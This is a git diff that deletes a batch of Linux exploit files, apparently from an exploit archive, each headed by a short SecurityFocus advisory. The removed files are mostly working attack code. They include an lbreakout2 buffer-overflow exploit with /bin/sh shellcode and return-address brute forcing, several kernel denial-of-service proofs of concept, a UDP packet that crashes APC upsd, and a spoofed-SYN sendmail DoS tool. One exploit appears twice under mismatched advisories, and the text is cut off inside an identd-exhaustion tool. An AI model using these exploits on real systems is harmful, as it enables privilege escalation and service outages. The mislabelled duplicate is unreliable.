- int ad1,ad2,zer,mem,pid,i;
- zer=open("/dev/zero",O_RDONLY);
- ad1=(int)mmap(0,PAGES*PAGE_SIZE,0,MAP_PRIVATE,zer,0);
- pid=getpid();
- if (!fork()) {
- char p[64];
- ptrace(PTRACE_ATTACH,pid,0,0);
- sleep(1);
- sprintf(p,"/proc/%d/mem",pid);
- mem=open(p,O_RDONLY);
- ad2=(int)mmap(0,PAGES*PAGE_SIZE,PROT_READ,MAP_PRIVATE,mem,ad1);
- write(1,(char*)ad2,PAGES*PAGE_SIZE);
- }
- sleep(100);
- return 0;
- }
diff --git a/platforms/linux/local/23738.c b/platforms/linux/local/23738.c
deleted file mode 100755
index 3efd37136..000000000
--- a/platforms/linux/local/23738.c
+++ /dev/null
@@ -1,186 +0,0 @@ -source: http://www.securityfocus.com/bid/9712/info - -Multiple buffer overflow vulnerabilities exist in the environment variable handling of LBreakout2. The issue is due to an insufficient boundary checking of certain environment variables used by the affected application. - -A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the game process. - -/* - * lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr - * vulnerability reported by Ulf Harnhammar - * usage: ./lbreakout2-exp [-r ][-b [-s ]] - * - */ - -#include -#include -#include -#include -#include -#include - -#define BSIZE 200 -#define D_START 0xbfffffff -#define PATH "/usr/local/bin/lbreakout2" - -void exec_vuln(); -int tease(); -int make_string(long ret_addr); -int bruteforce(long start); -void banner(char *argv); - -char shellcode[]= - "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3" - "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; - -char *buffer,*ptr; - -int -main(int argc,char *argv[]) -{ - char * option_list = "br:s:"; - int option,brute = 0,opterr = 0; - long ret,start = D_START; - - if (argc < 2) banner(argv[0]); - - while((option = getopt(argc,argv,option_list)) != -1) - switch(option) - { - case 'b': - brute = 1; - break; - case 'r': - ret = strtoul(optarg,NULL,0); - make_string(ret); - tease(); - exit(1); - break; - case 's': - start = strtoul(optarg,NULL,0); - break; - case '?': - fprintf(stderr,"[-] option \'%c\' invalid\n",optopt); - banner(argv[0]); - exit(1); - } - - if(brute) - bruteforce(start); - - return 0; -} - -void -exec_vuln() -{ - execl(PATH,PATH,NULL); -} - -int -tease() -{ - pid_t pid; - pid_t wpid; - int status; - - pid = fork(); - - if (pid == -1) - { - fprintf(stderr, "[-] %s: Failed to fork()\n",strerror(errno)); - exit(13); - } - else if (pid == 0) - { - exec_vuln(); - } - else - { - wpid = wait(&status); - if (wpid == -1) - { - fprintf(stderr,"[-] 
%s: wait()\n",strerror(errno)); - return 1; - } - else if (wpid != pid) - abort(); - else - { - if (WIFEXITED(status)) - { - fprintf(stdout,"[+] Exited: shell's ret code = %d\n",WEXITSTATUS(status)); - return WEXITSTATUS(status); - } - else if (WIFSIGNALED(status)) - return WTERMSIG(status); - else - fprintf(stderr,"[-] Stopped.\n"); - } - } - return 1; -} - -int -make_string(long ret_addr) -{ - int i; - long ret,addr,*addr_ptr; - - buffer = (char *)malloc(1024); - if(!buffer) - { - fprintf(stderr,"[-] Can't allocate memory\n"); - exit(-1); - } - - ret = ret_addr; - - ptr = buffer; - - memset(ptr,0x90,BSIZE-strlen(shellcode)); - ptr += BSIZE-strlen(shellcode); - - memcpy(ptr,shellcode,strlen(shellcode)); - ptr += strlen(shellcode); - - addr_ptr = (long *)ptr; - for(i=0;i<200;i++) - *(addr_ptr++) = ret; - ptr = (char *)addr_ptr; - *ptr = 0; - - setenv("HOME",buffer,1); - return 0; -} - -int -bruteforce(long start) -{ - int ret; - long i; - - fprintf(stdout,"[+] Starting bruteforcing...\n"); - - for(i=start;i<0;i=i-50) - { - fprintf(stdout,"[+] Testing 0x%x...\n",i); - make_string(i); - ret=tease(); - if(ret==0) - { - fprintf(stdout,"[+] Ret address found: 0x%x\n",i); - break; - } - } - - return 0; -} - -void -banner(char *argv) -{ - fprintf(stderr,"lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr\n"); - fprintf(stderr,"vulnerability reported by Ulf Harnhammar \n"); - fprintf(stderr,"usage: %s [-r ][-b [-s ]]\n",argv); - exit(1); -} diff --git a/platforms/linux/local/24078.c b/platforms/linux/local/24078.c deleted file mode 100755 index b42b49000..000000000 --- a/platforms/linux/local/24078.c +++ /dev/null 
@@ -1,108 +0,0 @@ -source: http://www.securityfocus.com/bid/10264/info - -PaX for 2.6 series Linux kernels has been reported prone to a local denial of service vulnerability. The issue is reported to present itself when PaX Address Space Layout Randomization Layout (ASLR) is enabled. - -The vulnerability may be exploited by a local attacker to influence the kernel into an infinite loop. - -/* - PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept - by Shadowinteger - 2004-05-04 - - Written after reading the security advisory posted by borg (ChrisR-) on - Bugtraq 2004-05-03 (my time). ChrisR -> www.cr-secure.net - - Acknowledgments: sabu (www.sabu.net) - - - Vulnerability: - PaX code for 2.6.x prior to 2004-05-01 in arch_get_unmapped_area() - (function in mm/mmap.c) is vulnerable to a local Denial of Service attack - because of a bug that puts the kernel into an infinite loop. - - Read the security advisory for more info: - http://www.securityfocus.com/archive/1/361968/2004-04-30/2004-05-06/0 - - - Exploitation: - We need to get passed the following line of code in - arch_get_unmapped_area() to succeed with a DoS: - if (TASK_SIZE - len < addr) { ... - - We do it like this: - - TASK_SIZE - TYPICAL_ADDR + SINK = DOSVAL - - DOSVAL is the value we'll use. - - arch_get_unmapped_area() does the following: - - if TASK_SIZE-DOSVAL < TYPICAL_ADDR then... run right into the vuln code. - (TASK_SIZE-DOSVAL) *must* be less than TYPICAL_ADDR to succeed. - - A DOSVAL of e.g. 0x80000000 or above will work most times, no real need - for the funky calculation above. - - There are quite a few functions available that are "front-ends" to - arch_get_unmapped_area(). This exploit uses good-old mmap(). 
- - - Tiny DoS PoC: - -#include -#include -#include -#include -#include -int main(void){int fd=open("/dev/zero",O_RDONLY);mmap(0,0xa0000000,PROT_READ,MAP_PRIVATE,fd,0);} - -*/ - -#include -#include -#include -#include -#include -#include - -#define TASK_SIZE 0xc0000000 -#define TYPICAL_ADDR 0x43882000 -#define SINK 0x04000000 - -#define DOSVAL (TASK_SIZE - TYPICAL_ADDR + SINK) - -int main() { - int fd = open("/dev/zero", O_RDONLY); - - printf("PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept\n" - "by Shadowinteger 20040504\n" - "created after a sec advisory on bugtraq posted by borg (ChrisR-) 20040503\n" - "ChrisR -> www.cr-secure.net\n" - "\n" - "the exploit binary must be marked PF_PAX_RANDMMAP to work!\n" - "\n" - "greetz goes to: sabu (www.sabu.net)\n" - "\n" - "------------------------------------------------------------------------------\n" - "will exec \"mmap(0, 0x%x, PROT_READ, MAP_PRIVATE, fd, 0);\"\n" - "\n" - "if you run Linux 2.6.x-PaX or -grsec, this may \"hurt\" your CPU(s) a little,\n" - "are you sure you want to continue? [type Y to continue] ", DOSVAL); - fflush(stdout); - - if (getchar() != 'Y') { - printf("aborted.\n"); - return 0; - } - - printf("\n" - "attempting to DoS...\n"); - - if (mmap(0, DOSVAL, PROT_READ, MAP_PRIVATE, fd, 0) == MAP_FAILED) { - perror("mmap"); - } - - printf("your kernel does not seem to be vulnerable! :)\n"); - - return 0; -} diff --git a/platforms/linux/local/26248.sh b/platforms/linux/local/26248.sh deleted file mode 100755 index 9ebe344cf..000000000 --- a/platforms/linux/local/26248.sh +++ /dev/null 
@@ -1,11 +0,0 @@
-source: http://www.securityfocus.com/bid/14790/info
-
-The Linux kernel is prone to a denial-of-service vulnerability. The kernel is affected by a memory leak, which eventually can result in a denial of service.
-
-A local attacker can exploit this vulnerability by making repeated reads to the '/proc/scsi/sg/devices' file, which will exhaust kernel memory and lead to a denial of service.
-
-#!/bin/sh
-
-while true; do
-cat /proc/scsi/sg/devices > /dev/null
-done
\ No newline at end of file
diff --git a/platforms/linux/local/26382.c b/platforms/linux/local/26382.c
deleted file mode 100755
index 6a2e8eca0..000000000
--- a/platforms/linux/local/26382.c
+++ /dev/null
@@ -1,243 +0,0 @@ -source: http://www.securityfocus.com/bid/15156/info - -Linux Kernel is reported prone to a local denial-of-service vulnerability. - -This issue arises from an infinite loop when binding IPv6 UDP ports. - -/* - * Linux kernel - * IPv6 UDP port selection infinite loop - * local denial of service vulnerability - * proof of concept code - * version 1.0 (Oct 29 2005) - * CVE ID: CAN-2005-2973 - * - * by Remi Denis-Courmont < exploit at simphalempin dot com > - * http://www.simphalempin.com/dev/ - * - * Vulnerable: - * - Linux < 2.6.14 with IPv6 - * - * Not vulnerable: - * - Linux >= 2.6.14 - * - Linux without IPv6 - * - * Fix: - * http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git; - * a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2 - */ - - -/***************************************************************************** - * Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. * - * * - * Redistribution and use in source and binary forms, with or without * - * modification, are permitted provided that the following conditions * - * are met: * - * 1. Redistributions of source code must retain the above copyright notice, * - * this list of conditions and the following disclaimer. * - * 2. Redistribution in binary form must reproduce the above copyright * - * notice, this list of conditions and the following disclaimer in the * - * documentation and/or other materials provided with the distribution. * - * * - * The author's liability shall not be incurred as a result of loss of due * - * the total or partial failure to fulfill anyone's obligations and direct * - * or consequential loss due to the software's use or performance. * - * * - * The current situation as regards scientific and technical know-how at the * - * time when this software was distributed did not enable all possible uses * - * to be tested and verified, nor for the presence of any or all faults to * - * be detected. 
In this respect, people's attention is drawn to the risks * - * associated with loading, using, modifying and/or developing and * - * reproducing this software. * - * The user shall be responsible for verifying, by any or all means, the * - * software's suitability for its requirements, its due and proper * - * functioning, and for ensuring that it shall not cause damage to either * - * persons or property. * - * * - * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * - * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * - * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * - * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * - * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * - * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * - * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * - * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * - * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * - * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * - * * - * The author does not either expressly or tacitly warrant that this * - * software does not infringe any or all third party intellectual right * - * relating to a patent, software or to any or all other property right. * - * Moreover, the author shall not hold someone harmless against any or all * - * proceedings for infringement that may be instituted in respect of the * - * use, modification and redistrbution of this software. 
* - *****************************************************************************/ - - -#include -#include -#include - -#include -#include -#include -#include -#include -#include -#include -#include - -static int -bind_udpv6_port (uint16_t port) -{ - int fd; - - fd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP); - if (fd != -1) - { - struct sockaddr_in6 addr; - int val = 1; - - setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val)); - - memset (&addr, 0, sizeof (addr)); - addr.sin6_family = AF_INET6; - addr.sin6_port = htons (port); - if (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0) - return fd; - - close (fd); - } - return -1; -} - - -static int -get_fd_limit (void) -{ - struct rlimit lim; - - getrlimit (RLIMIT_NOFILE, &lim); - lim.rlim_cur = lim.rlim_max; - setrlimit (RLIMIT_NOFILE, &lim); - return (int)lim.rlim_max; -} - - -static void -get_port_range (uint16_t *range) -{ - FILE *stream; - - /* conservative defaults */ - range[0] = 1024; - range[1] = 65535; - - stream = fopen ("/proc/sys/net/ipv4/ip_local_port_range", "r"); - if (stream != NULL) - { - unsigned i[2]; - - if ((fscanf (stream, "%u %u", i, i + 1) == 2) - && (i[0] <= i[1]) && (i[1] < 65535)) - { - range[0] = (uint16_t)i[0]; - range[1] = (uint16_t)i[1]; - } - fclose (stream); - } -} - - -/* The criticial is fairly simple to raise : the infinite loop occurs when - * calling bind with no speficied port number (ie zero), if and only if the - * IPv6 stack cannot find any free UDP port within the local port range - * (normally 32768-61000). Because this requires times more sockets than what - * a process normally can open at a given time, we have to spawn several - * processes. Then, the simplest way to trigger the crash condition consists - * of opening up kernel-allocated UDP ports until it crashes, but that is - * fairly slow (because allocation are stored in small a hash table of lists, - * that are checked at each allocation). 
A much faster scheme involves getting - * the local port range from /proc, allocating one by one, and only then, ask - * for automatic (any/zero) port allocation. - */ -static int -proof (void) -{ - int lim, val = 2; - pid_t pid, ppid; - uint16_t range[2], port; - - lim = get_fd_limit (); - if (lim <= 3) - return -2; - - get_port_range (range); - - port = range[0]; - ppid = getpid (); - - puts ("Stage 1..."); - do - { - switch (pid = fork ()) - { - case 0: - for (val = 3; val < lim; val++) - close (val); - - do - { - if (bind_udpv6_port (port) >= 0) - { - if (port) - port++; - } - else - if (port && (errno == EADDRINUSE)) - port++; /* skip already used port */ - else - if (errno != EMFILE) - /* EAFNOSUPPORT -> no IPv6 stack */ - /* EADDRINUSE -> not vulnerable */ - exit (1); - - if (port > range[1]) - { - puts ("Stage 2... should crash quickly"); - port = 0; - } - } - while (errno != EMFILE); - - break; /* EMFILE: spawn new process */ - - case -1: - exit (2); - - default: - wait (&val); - if (ppid != getpid ()) - exit (WIFEXITED (val) ? WEXITSTATUS (val) : 2); - } - } - while (pid == 0); - - puts ("System not vulnerable"); - return -val; -} - -int -main (int argc, char *argv[]) -{ - setvbuf (stdout, NULL, _IONBF, 0); - puts ("Linux kernel IPv6 UDP port infinite loop vulnerability\n" - "proof of concept code\n" - "Copyright (C) 2005 Remi Denis-Courmont " - "<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70" - "\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n"); - - return -proof (); -} - diff --git a/platforms/linux/local/26489.c b/platforms/linux/local/26489.c deleted file mode 100755 index 5b6936e29..000000000 --- a/platforms/linux/local/26489.c +++ /dev/null 
@@ -1,243 +0,0 @@ -source: http://www.securityfocus.com/bid/15365/info - -Linux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from a failure to properly unregister kernel resources when network devices are removed. - -This issue allows local attackers to deny service to legitimate users. Attackers may also be able to execute arbitrary code in the context of the kernel, but this has not been confirmed. - -/* - * Linux kernel - * IPv6 UDP port selection infinite loop - * local denial of service vulnerability - * proof of concept code - * version 1.0 (Oct 29 2005) - * CVE ID: CAN-2005-2973 - * - * by Remi Denis-Courmont < exploit at simphalempin dot com > - * http://www.simphalempin.com/dev/ - * - * Vulnerable: - * - Linux < 2.6.14 with IPv6 - * - * Not vulnerable: - * - Linux >= 2.6.14 - * - Linux without IPv6 - * - * Fix: - * http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git; - * a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2 - */ - - -/***************************************************************************** - * Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. * - * * - * Redistribution and use in source and binary forms, with or without * - * modification, are permitted provided that the following conditions * - * are met: * - * 1. Redistributions of source code must retain the above copyright notice, * - * this list of conditions and the following disclaimer. * - * 2. Redistribution in binary form must reproduce the above copyright * - * notice, this list of conditions and the following disclaimer in the * - * documentation and/or other materials provided with the distribution. * - * * - * The author's liability shall not be incurred as a result of loss of due * - * the total or partial failure to fulfill anyone's obligations and direct * - * or consequential loss due to the software's use or performance. 
* - * * - * The current situation as regards scientific and technical know-how at the * - * time when this software was distributed did not enable all possible uses * - * to be tested and verified, nor for the presence of any or all faults to * - * be detected. In this respect, people's attention is drawn to the risks * - * associated with loading, using, modifying and/or developing and * - * reproducing this software. * - * The user shall be responsible for verifying, by any or all means, the * - * software's suitability for its requirements, its due and proper * - * functioning, and for ensuring that it shall not cause damage to either * - * persons or property. * - * * - * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * - * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * - * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * - * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * - * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * - * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * - * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * - * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * - * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * - * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * - * * - * The author does not either expressly or tacitly warrant that this * - * software does not infringe any or all third party intellectual right * - * relating to a patent, software or to any or all other property right. * - * Moreover, the author shall not hold someone harmless against any or all * - * proceedings for infringement that may be instituted in respect of the * - * use, modification and redistrbution of this software. 
* - *****************************************************************************/ - - -#include -#include -#include - -#include -#include -#include -#include -#include -#include -#include -#include - -static int -bind_udpv6_port (uint16_t port) -{ - int fd; - - fd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP); - if (fd != -1) - { - struct sockaddr_in6 addr; - int val = 1; - - setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val)); - - memset (&addr, 0, sizeof (addr)); - addr.sin6_family = AF_INET6; - addr.sin6_port = htons (port); - if (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0) - return fd; - - close (fd); - } - return -1; -} - - -static int -get_fd_limit (void) -{ - struct rlimit lim; - - getrlimit (RLIMIT_NOFILE, &lim); - lim.rlim_cur = lim.rlim_max; - setrlimit (RLIMIT_NOFILE, &lim); - return (int)lim.rlim_max; -} - - -static void -get_port_range (uint16_t *range) -{ - FILE *stream; - - /* conservative defaults */ - range[0] = 1024; - range[1] = 65535; - - stream = fopen ("/proc/sys/net/ipv4/ip_local_port_range", "r"); - if (stream != NULL) - { - unsigned i[2]; - - if ((fscanf (stream, "%u %u", i, i + 1) == 2) - && (i[0] <= i[1]) && (i[1] < 65535)) - { - range[0] = (uint16_t)i[0]; - range[1] = (uint16_t)i[1]; - } - fclose (stream); - } -} - - -/* The criticial is fairly simple to raise : the infinite loop occurs when - * calling bind with no speficied port number (ie zero), if and only if the - * IPv6 stack cannot find any free UDP port within the local port range - * (normally 32768-61000). Because this requires times more sockets than what - * a process normally can open at a given time, we have to spawn several - * processes. Then, the simplest way to trigger the crash condition consists - * of opening up kernel-allocated UDP ports until it crashes, but that is - * fairly slow (because allocation are stored in small a hash table of lists, - * that are checked at each allocation). 
A much faster scheme involves getting - * the local port range from /proc, allocating one by one, and only then, ask - * for automatic (any/zero) port allocation. - */ -static int -proof (void) -{ - int lim, val = 2; - pid_t pid, ppid; - uint16_t range[2], port; - - lim = get_fd_limit (); - if (lim <= 3) - return -2; - - get_port_range (range); - - port = range[0]; - ppid = getpid (); - - puts ("Stage 1..."); - do - { - switch (pid = fork ()) - { - case 0: - for (val = 3; val < lim; val++) - close (val); - - do - { - if (bind_udpv6_port (port) >= 0) - { - if (port) - port++; - } - else - if (port && (errno == EADDRINUSE)) - port++; /* skip already used port */ - else - if (errno != EMFILE) - /* EAFNOSUPPORT -> no IPv6 stack */ - /* EADDRINUSE -> not vulnerable */ - exit (1); - - if (port > range[1]) - { - puts ("Stage 2... should crash quickly"); - port = 0; - } - } - while (errno != EMFILE); - - break; /* EMFILE: spawn new process */ - - case -1: - exit (2); - - default: - wait (&val); - if (ppid != getpid ()) - exit (WIFEXITED (val) ? WEXITSTATUS (val) : 2); - } - } - while (pid == 0); - - puts ("System not vulnerable"); - return -val; -} - -int -main (int argc, char *argv[]) -{ - setvbuf (stdout, NULL, _IONBF, 0); - puts ("Linux kernel IPv6 UDP port infinite loop vulnerability\n" - "proof of concept code\n" - "Copyright (C) 2005 Remi Denis-Courmont " - "<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70" - "\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n"); - - return -proof (); -} - diff --git a/platforms/linux/local/29683.txt b/platforms/linux/local/29683.txt deleted file mode 100755 index f2b30852f..000000000 --- a/platforms/linux/local/29683.txt +++ /dev/null 
@@ -1,10 +0,0 @@
-source: http://www.securityfocus.com/bid/22737/info
-
-The Linux Kernel is prone to a denial-of-service vulnerability.
-
-A local attacker can exploit this issue to crash the kernel.
-
-Linux kernel versions 2.6.x are vulnerable to this issue.
-
-1. auditctl -w /etc/shadow
-2. useradd userb
\ No newline at end of file
diff --git a/platforms/linux/remote/19075.c b/platforms/linux/remote/19075.c
deleted file mode 100755
index 33eb197aa..000000000
--- a/platforms/linux/remote/19075.c
+++ /dev/null
@@ -1,55 +0,0 @@
-source: http://www.securityfocus.com/bid/83/info
-
-APC PowerChute PLUS is a software package that will safely shutdown computer systems locally or accross a network when UPS power starts to fail. When operating PowerChute PLUS normally listens to TCP ports 6547 and 6548, as well as for broadcast requests in UDP port 6549.
-
-A request packet can be craftted and sent to the UDP port such that the upsd server will crash. This is been tested in the Solaris i386 version of the product.
-
-It has also been reported the software will crash in some instances when port scanned.
-
-It seems you can also manage any APC UPS remotely without providing any credential if you have the APC client software.
-
-Both the client and server software also create files insecurely in /tmp. The pager script (dialpager.sh) also contains unsafe users of temporary files. The mailer script (mailer.sh) passes the files provided in the command line to rm without checking them.
-
------ begin downupsd.c -----
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-int main(int argc, char **argv) {
-int s;
-long on=1;
-size_t addrsize;
-char buffer[256];
-struct sockaddr_in toaddr, fromaddr;
-struct hostent h_ent;
-
-if(argc!=2) {
-fprintf(stderr, "Usage:\n\t%s \n", argv[0]);
-exit(0);
-}
-s = socket(AF_INET,SOCK_DGRAM,0);
-setsockopt(s, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));
-
-printf("Crashing upsd on host's subnet: %s\n", argv[1]);
-
-toaddr.sin_family = AF_INET;
-toaddr.sin_port = htons(0);
-toaddr.sin_addr.s_addr = 0x00000000;
-bind(s, (struct sockaddr *)&toaddr, sizeof(struct sockaddr_in));
-toaddr.sin_port = htons(6549);
-memcpy((char *)&h_ent, (char *)gethostbyname(argv[1]), sizeof(h_ent));
-memcpy(&toaddr.sin_addr.s_addr, h_ent.h_addr, sizeof(struct in_addr));
-toaddr.sin_addr.s_addr |= 0xff000000;
-strcpy(buffer, "027|1|public|9|0|0|2010~|0\0");
-sendto(s, buffer, 256, 0, (struct sockaddr *)&toaddr,
-sizeof(struct sockaddr_in));
-
-printf("Crashed...\n");
-close(s);
-
-}
-------- end downupsd.c -----
\ No newline at end of file
diff --git a/platforms/linux/remote/19282.c b/platforms/linux/remote/19282.c
deleted file mode 100755
index aaaacfa82..000000000
--- a/platforms/linux/remote/19282.c
+++ /dev/null
@@ -1,341 +0,0 @@ -source: http://www.securityfocus.com/bid/363/info - -The 2.0.x kernels have a quirk in the TCP implementation that have to do with the accept() call returning after only a syn has been recieved (as opposed to the three way handshake having been completed). Sendmail, which is compiled on many unices, makes the assumption that the three way handshake has been completed and a tcp connection has been fully established. This trust in a standard tcp implementation is seen in the following section of code : - -t = accept(DaemonSocket, - -(struct sockaddr *)&RealHostAddr, &lotherend); - -if (t >= 0 || errno != EINTR) - -break; - -} - -savederrno = errno; - -(void) blocksignal(SIGALRM); - -if (t < 0) - -{ errno = savederrno; - -syserr("getrequests: accept"); - -/* arrange to re-open the socket next time around */ - -(void) close(DaemonSocket); - -DaemonSocket = -1; - -refusingconnections = TRUE; - -sleep(5); - -continue; - -} - -It's possible to cause a denial of service here if a RST is sent after the initial SYN to the sendmail smtpd on port 25. If that were to be done, the sendmail smtpd would be caught in a loop (above) accepting, testing the socket [yes, the one which accept returned on listening on port 25], sleeping, and closing the socket for as long as the syns and following rsts are sent. It is also completely possible to do this with spoofed packets. 
- - -/* - -* smad.c - sendmail accept dos - - -* - -* Salvatore Sanfilippo [AntireZ] - -* Intesis SECURITY LAB Phone: +39-2-671563.1 - -* Via Settembrini, 35 Fax: +39-2-66981953 - -* I-20124 Milano ITALY Email: antirez@seclab.com - -* md5330@mclink.it - -* - -* compile it under Linux with gcc -Wall -o smad smad.c - -* - -* usage: smad fakeaddr victim [port] - -*/ - -#include - -#include - -#include - -#include - -#include - -#include - -#include - -#include - -#include - -#include - -#include - -#include - -#define SLEEP_UTIME 100000 /* modify it if necessary */ - -#define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct tcphdr)) - -#define OFFSETTCP (sizeof(struct iphdr)) - -#define OFFSETIP (0) - -u_short cksum(u_short *buf, int nwords) - -{ - -unsigned long sum; - -u_short *w = buf; - -for (sum = 0; nwords > 0; nwords-=2) - -sum += *w++; - -sum = (sum >> 16) + (sum & 0xffff); - -sum += (sum >> 16); - -return ~sum; - -} - -void resolver (struct sockaddr * addr, char *hostname, u_short port) - -{ - -struct sockaddr_in *address; - -struct hostent *host; - -address = (struct sockaddr_in *)addr; - -(void) bzero((char *)address, sizeof(struct sockaddr_in)); - -address->sin_family = AF_INET; - -address->sin_port = htons(port); - -address->sin_addr.s_addr = inet_addr(hostname); - -if ( (int)address->sin_addr.s_addr == -1) { - -host = gethostbyname(hostname); - -if (host) { - -bcopy( host->h_addr, - -(char *)&address->sin_addr,host->h_length); - -} else { - -perror("Could not resolve address"); - -exit(-1); - -} - - -} - -} - -int main(int argc, char **argv) - -{ - -char runchar[] = "|/-\\"; - -char packet[PACKETSIZE], - -*fromhost, - -*tohost; - -u_short fromport = 3000, - -toport = 25; - -struct sockaddr_in local, remote; - -struct iphdr *ip = (struct iphdr*) (packet + OFFSETIP); - -struct tcphdr *tcp = (struct tcphdr*) (packet + OFFSETTCP); - -struct tcp_pseudohdr - -{ - -struct in_addr saddr; - -struct in_addr daddr; - -u_char zero; - -u_char protocol; - -u_short 
lenght; - -struct tcphdr tcpheader; - -} - -pseudoheader; - -int sock, result, runcharid = 0; - -if (argc < 3) - -{ - -printf("usage: %s fakeaddr victim [port]\n", argv[0]); - -exit(0); - -} - -if (argc == 4) - -toport = atoi(argv[3]); - -bzero((void*)packet, PACKETSIZE); - -fromhost = argv[1]; - -tohost = argv[2]; - -resolver((struct sockaddr*)&local, fromhost, fromport); - -resolver((struct sockaddr*)&remote, tohost, toport); - -sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); - -if (sock == -1) { - -perror("can't get raw socket"); - -exit(1); - -} - -/* src addr */ - -bcopy((char*)&local.sin_addr, &ip->saddr,sizeof(ip->saddr)); - -/* dst addr */ - -bcopy((char*)&remote.sin_addr,&ip->daddr,sizeof(ip->daddr)); - -ip->version = 4; - -ip->ihl = sizeof(struct iphdr)/4; - -ip->tos = 0; - -ip->tot_len = htons(PACKETSIZE); - -ip->id = htons(getpid() & 255); - -/* no flags */ - -ip->frag_off = 0; - -ip->ttl = 64; - -ip->protocol = 6; - -ip->check = 0; - -tcp->th_dport = htons(toport); - -tcp->th_sport = htons(fromport); - -tcp->th_seq = htonl(32089744); - -tcp->th_ack = htonl(0); - -tcp->th_off = sizeof(struct tcphdr)/4; - -/* 6 bit reserved */ - -tcp->th_flags = TH_SYN; - -tcp->th_win = htons(512); - -/* start of pseudo header stuff */ - -bzero(&pseudoheader, 12+sizeof(struct tcphdr)); - -pseudoheader.saddr.s_addr=local.sin_addr.s_addr; - -pseudoheader.daddr.s_addr=remote.sin_addr.s_addr; - -pseudoheader.protocol = 6; - -pseudoheader.lenght = htons(sizeof(struct tcphdr)); - -bcopy((char*) tcp, (char*) &pseudoheader.tcpheader, - -sizeof(struct tcphdr)); - -/* end */ - -tcp->th_sum = cksum((u_short *) &pseudoheader, - -12+sizeof(struct tcphdr)); - -/* 16 bit urg */ - -while (0) - -{ - -result = sendto(sock, packet, PACKETSIZE, 0, - -(struct sockaddr *)&remote, sizeof(remote)); - -if (result != PACKETSIZE) - -{ - -perror("sending packet"); - -exit(0); - -} printf("\b"); - -printf("%c", runchar[runcharid]); - -fflush(stdout); - -runcharid++; - -if (runcharid == 4) - 
-runcharid = 0; - -usleep(SLEEP_UTIME); - -} - -return 0; - -} \ No newline at end of file diff --git a/platforms/linux/remote/19463.c b/platforms/linux/remote/19463.c deleted file mode 100755 index 6b11f54da..000000000 --- a/platforms/linux/remote/19463.c +++ /dev/null 
@@ -1,109 +0,0 @@
-source: http://www.securityfocus.com/bid/587/info
-
-In the inetd.conf under certain distributions of SuSE Linux the in.identd daemon is started with the -w -t120 option. This means that one identd process waits 120 seconds after answering the first request to answer the next request. If a malicious remote attacker starts a large number of ident requests in a short period of time it will force the target machine to start multiple daemons because the initial daemon is in a time wait state. This can eventually lead the machine to starve itself of memory resulting essentially in a machine halt.
-
-/* susekill.c by friedolin
- *
- * used to kill lame SuSE Linux boxes with identd running
- * identd must be started with -w -t120 to crash a machine
- *
- * have fun, friedolin
- *
- * based on gewse.c by napster
- */
-
-/* Tested systems:
- *
- * vulnerable:
- *
- * SuSE-Linux 4.4 - 6.2
- * Slackware 3.2 and 3.6
- *
- * not vulnerable:
- *
